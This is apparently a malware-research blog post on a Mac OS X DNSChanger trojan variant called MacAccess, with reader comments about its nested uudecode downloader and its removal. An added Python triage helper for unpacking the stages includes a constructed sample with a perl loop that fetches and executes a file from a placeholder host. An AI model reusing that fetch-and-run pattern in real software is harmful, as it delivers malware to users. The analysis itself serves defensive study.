What’s new? Here is a static analysis of this new variant. Notice the header: it seems the compression used was changed.
The preinstall/preupgrade script now looks like this:
Previous variants contain code or string sequences such as the following:
Previously the installer was named “MacVideo” or “Porn4Mac”; today it is “MacAccess”.
Most of the known IPs and nodes used by this threat are currently active and serving this variant.
Stay safe and report dodgy websites!



“Notice the header, it seems the compression used was changed”…
Why do you look at the disk image? It’s just an archive which changes each time you create a new image with the same content.
What you didn’t notice is that it is a Downloader.
In the last uudecode stage there’s a perl script which downloads binaries and launches them in a loop.
The server is down now, but yesterday I downloaded 2 files with different lengths. That’s a new DNSChanger variant.
Comment by Steve — November 19, 2008 @ 2:44 pm
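A triage helper for the nested uudecode staging Steve describes, added here as an illustration and not part of the original post or of the trojan itself: it unwraps every `begin`/`end` block, recurses into text payloads that carry further blocks, and flags any recovered stage that pairs a loop keyword with a fetch tool on one line. The installer script, stage names and URL are constructed placeholders.

```python
import binascii
import re

UU_BLOCK = re.compile(r"^begin [0-7]{3} (\S+)\n(.*?)^end$", re.M | re.S)
DOWNLOAD_LOOP = re.compile(rb"\b(while|for|until)\b[^\n]*\b(curl|wget|fetch|LWP)\b")

def uuencode(name, data):
    """Minimal uuencode(1) clone, used here only to build the constructed sample."""
    body = [binascii.b2a_uu(data[i:i + 45]).decode("ascii").rstrip("\n")
            for i in range(0, len(data), 45)]
    return "\n".join([f"begin 644 {name}", *body, "`", "end"]) + "\n"

def uudecode_block(body):
    """Decode the lines between 'begin' and 'end'. Blank lines are skipped:
    a2b_uu('') would yield 32 NUL bytes instead of nothing."""
    out = bytearray()
    for line in body.splitlines():
        if line.strip():
            out += binascii.a2b_uu(line)
    return bytes(out)

def extract_stages(text, depth=0, max_depth=5):
    """Return [(depth, name, payload)] for every uuencoded block, recursing into text payloads."""
    stages = []
    for m in UU_BLOCK.finditer(text):
        payload = uudecode_block(m.group(2))
        stages.append((depth, m.group(1), payload))
        if depth < max_depth:
            try:
                stages += extract_stages(payload.decode("utf-8"), depth + 1, max_depth)
            except UnicodeDecodeError:
                pass  # binary stage: recorded above, nothing further to unwrap
    return stages

def triage(script_text):
    """Summarise each recovered stage and flag the ones that look like a downloader."""
    return [{"depth": d, "name": n, "size": len(p),
             "perl": p.startswith(b"#!/usr/bin/perl"),
             "download_loop": bool(DOWNLOAD_LOOP.search(p))}
            for d, n, p in extract_stages(script_text)]

# Constructed sample (hypothetical content, not the real trojan's): a preinstall script
# that uudecodes stage1, a shell script, which in turn uudecodes stage2, a perl loop.
STAGE2 = (b"#!/usr/bin/perl\n"
          b"while (1) { system('curl -s -o /tmp/upd http://updates.invalid/upd');\n"
          b"            system('/tmp/upd'); sleep 300; }\n")
STAGE1 = ("#!/bin/sh\nuudecode <<'EOF'\n" + uuencode("stage2", STAGE2) + "EOF\n").encode()
PREINSTALL = "#!/bin/sh\nuudecode <<'EOF'\n" + uuencode("stage1", STAGE1) + "EOF\nsh stage1\n"
```

Running `triage(PREINSTALL)` yields one row per stage; only the innermost perl stage is flagged as a download loop.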
Thanks Steve! I already got “jah” and “withlove” =) Btw, I sent you an email offline.
Comment by Methusela Cebrian Ferrer — November 23, 2008 @ 6:02 am
You can see a screenshot of RSPLUG-D on the Intego security memo webpage:
http://www.intego.com/news/ism0806.asp
Comment by frolika — November 26, 2008 @ 6:05 pm
Greetings,
I was wondering if it would be possible for you to send us samples of the new DNSChanger variant for OS X for further analysis. Thank you for your time and assistance!
Comment by Nicholas Ptacek — December 1, 2008 @ 7:20 pm
Hi Nicholas, I’ll send you an email offline.
Comment by Methusela Cebrian Ferrer — December 3, 2008 @ 12:24 am
[...] installer name MacAccess is apparently just one of the names this threat goes by. Its reported previous names are MacVideo and [...]
Pingback by Can Apple Keep Malware Away? | TrendLabs | Malware Blog - by Trend Micro — December 4, 2008 @ 2:03 pm
What if I accidentally installed it? How can I remove it now and make sure that I don’t have a virus on my computer??
Comment by m — December 11, 2008 @ 2:55 am
Hello, I don’t know how to uninstall this “MacAccess”. I installed it accidentally and now it doesn’t appear in my Finder; what should I do?
Comment by Ismael — December 11, 2008 @ 9:47 am
[...] installer name MacAccess is apparently just one of the names this threat goes by. Its reported previous names are MacVideo and [...]
Pingback by Can Apple Keep Malware Away? | Top Tech News, LIVE — December 12, 2008 @ 9:38 am
I just accidentally installed MacAccess too. What can I do?
Comment by Jacob — December 19, 2008 @ 5:00 am
Same problem with me.. heeeelp, how do I uninstall this????
Comment by erico dias — December 23, 2008 @ 11:04 am
For more information on how to delete the malicious files created by this exploit, go to http://ithreats.wordpress.com/2008/01/11/analysis-of-osx-trojan-dns-changer/ inside this same site. It’s a very good analysis and how-to-solve recipe. After the very clear explanation in the comments, I eliminated the file created by the installer package and voilà. Even better than VirusBarrier, and without paying even a penny.
Hope this could be useful. Cheers!
Comment by Arty — December 24, 2008 @ 3:43 am
Cheers Arty!
I have been receiving continuous infection reports about this threat, and I can’t help but reply and send manual removal instructions to each email I receive. So, I decided to publish step-by-step removal instructions here:
http://ithreats.wordpress.com/2008/12/26/how-to-remove-macaccess-trojan/
I hope this helps!
~ Meths
Comment by Methusela Cebrian Ferrer — December 26, 2008 @ 12:17 pm
Dear Meths, I’ve seen your entry and I found it perfect for all folks who could have problems with this trojan. I’m sure that your explanation will be very useful (more useful than any anti-virus program, as those do not reliably detect this kind of infection).
~Arty
Comment by Arty — December 31, 2008 @ 3:04 am